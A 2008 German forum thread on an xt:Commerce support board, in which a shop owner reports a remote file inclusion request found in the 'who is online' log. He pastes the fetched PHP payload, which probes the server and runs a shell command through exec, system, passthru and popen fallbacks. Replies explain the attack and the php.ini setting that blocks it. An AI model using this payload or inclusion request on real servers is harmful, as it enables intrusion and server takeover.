#1 (permalink)  
Alt 29.07.2008, 18:31
Benutzer
 
Registriert seit: 26.01.2004
Beiträge: 43
Daumen runter Hackversuch ?!?!

Hab eben beim WHO IS ONLINE folgendes gefunden :
00:09:19 0 Guest 74.55.183.82 19:19:18 19:19:18 /shop/index.php?x=http://rjoos.ch/Reise/images/tOtti/help.txt??

Jemand versucht aus dem Shop die Seite (oben) auszuführen ...

Rauskommen tut bei der txt.datei folgendes (was ist das ??) :

<?
$dir = @getcwd();
echo "Mic22<br>";
$ker = @php_uname();
$OS = @PHP_OS;
echo "OSTYPE:$OS<br>";
echo "<br>Kernel:$ker<br>";
$free = disk_free_space($dir);

if ($free === FALSE) {$free = 0;}

if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)."<br>";

$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;

function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}

function view_size($size)

{

if (!is_numeric($size)) {return FALSE;}

else

{

if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}

elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}

elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}

else {$size = $size . " B";}

return $size;

}

}

exit;
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #2 (permalink)  
Alt 30.07.2008, 00:42
tuvalu
Gast
 
Beiträge: n/a
Standard

Das ist ein üblich Eintrag, funktioniert beim aktuellen Shop aber nicht.

Entwarnung.

tuvalu

Geändert von tuvalu (30.07.2008 um 01:48 Uhr)
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #3 (permalink)  
Alt 30.07.2008, 01:35
Benutzer
 
Registriert seit: 21.03.2004
Beiträge: 48
Standard

das kommt davon, wenn fopen zugelassen ist (php.ini)
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #4 (permalink)  
Alt 30.07.2008, 07:58
Benutzer
 
Registriert seit: 26.01.2004
Beiträge: 43
Standard

Was bedeutet das ?!
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #5 (permalink)  
Alt 30.07.2008, 11:18
Benutzer
 
Registriert seit: 21.03.2004
Beiträge: 48
Standard

Zitat:
Zitat von Grisu77 Beitrag anzeigen
Was bedeutet das ?!
da kann ein String an ein php Script angehängt werden, was
(wenn vom System erlaubt) obige Befehle (popen, exec, etc.) ausführt.
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
  #6 (permalink)  
Alt 30.07.2008, 15:51
Erfahrener Benutzer
 
Registriert seit: 08.03.2005
Ort: Mußtopp
Beiträge: 638
Standard

Zitat:
Zitat von Grisu77 Beitrag anzeigen
Was bedeutet das ?!
Es gibt Sicherheitseinstellungen (php.ini) mit denen man dem php-interpreter verbieten kann Dateien, resp. Programmdateien, von fremden Servern herunterzuladen. Gelingt es einem Angreifer ein paar eigene Programmbefehle einzuschleusen und zu Ausführung zu bringen kann er mittels der o.g. Funktionalität komplette Fremdprogramme einschleusen die es ihm ermöglichen das System vollständig unter seine Kontrolle zu bringen.

Eben um dieses Einbruchsszenario im Grundsatz zu unterbinden gibt es diesen Schalter in den php-Konfigurationen. Solange keine regulären Anwendungen laufen welche das externe nachladen von Dateien erfordern sollte dies verboten sein.


mfg

Geändert von hubbabubba (30.07.2008 um 15:53 Uhr)
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!Wong this Post!
Mit Zitat antworten
Antwort

Lesezeichen

Stichworte
hackversuch

Themen-Optionen
Ansicht

Forumregeln
Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are aus
Pingbacks are aus
Refbacks are aus



Alle Zeitangaben in WEZ +1. Es ist jetzt 05:19 Uhr.

Copyright © 2011 xt:Commerce GmbH / xt:Commerce International Ltd. - All Rights Reserved

xt:Commerce is a SafeCharge brand